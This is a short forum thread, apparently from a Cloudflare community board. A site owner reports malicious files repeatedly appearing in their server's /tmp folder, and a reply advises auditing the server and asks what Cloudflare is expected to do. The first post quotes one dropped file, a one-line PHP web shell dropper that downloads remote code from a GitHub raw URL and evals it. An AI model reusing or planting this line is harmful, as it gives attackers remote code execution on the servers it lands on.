Still getting hacks in the /tmp folder

This is today
20240519-203048-Zkq12FE4GVkjhvuXYXoS4gAAAEk-file-VrSgLM.1716172248_1

<?php @eval("?>".file_get_contents("https://raw.githubusercontent.com/Jenderal92/KC5/master/shin.php"));?>

That sounds like you have something on your server that’s compromised.

I’d recommend you double check your server configuration, any plugins/software you have installed, audit your code, ensure everything is up to date, etc.

Was there something specifically you wanted Cloudflare to do here? It’s not super clear right now.

2 Likes

The site that is hacking is hosted on Cloudflare.

Also, most of the attacks come from there.

image001.png

This topic was automatically closed 2 days after the last reply. New replies are no longer allowed.